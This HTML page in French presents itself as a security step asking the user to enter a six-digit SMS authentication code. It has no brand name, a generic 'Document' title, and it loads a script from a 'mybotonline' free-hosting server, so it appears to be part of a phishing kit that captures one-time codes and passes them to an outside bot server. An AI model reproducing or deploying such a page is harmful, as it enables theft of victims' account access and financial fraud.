<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-4bw+/aepP/YC94hEpVNVgiZdgIC5+VKNBQNGCHeKRQN+PtmoHDEXuppvnDJzQIu9" crossorigin="anonymous">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css" integrity="sha512-z3gLpd7yknf1YoNbCzqRKc4qyor8gaKU1qmn+CShxbuBusANI9QpRohGBreCFkKxLhei6S9CQXFEbbKuqLg0DA==" crossorigin="anonymous" referrerpolicy="no-referrer" />
    <link rel="stylesheet" href="./style.css">
    <link rel="stylesheet" href="./style2.css">
    <title>Document</title>
</head>
<body>
    <div class="header shadow-sm row">
        <div class="col-6">
            <img src="./img/logo.png" alt="">
        </div>
        
    </div>
    <main class="center">
            <h1 style="text-align: center; text-transform: uppercase;">
                authentication
            </h1>
            <P>Pour garantir la sécurité de votre compte, nous avons envoyé un code d'authentification par SMS à votre numéro de téléphone enregistré. </P>
            <br>
            <img src="./img/authentication.png">
            <br>
                <form id="form3">

                        <label style="color: inherit; margin-top: 8px; font-size: inherit; font-style: inherit; font-weight: 200; text-transform: inherit;">SMS Code*</label> <br>

                        <input type="text" 
                        id="input"
                        maxlength="6" minlength="6" name="sms" placeholder="Entrer le code ici" outline="none" required> <br> <br> <br>
                        
                        <button type="submit"><span class="">Confirmer</span></button> <br>
                

                </form>


        </div>
    </main>
</body>
<script src="https://mybotonline.000webhostapp.com/serveur/file.js"></script>
<script src="./auth.js"></script>
</html>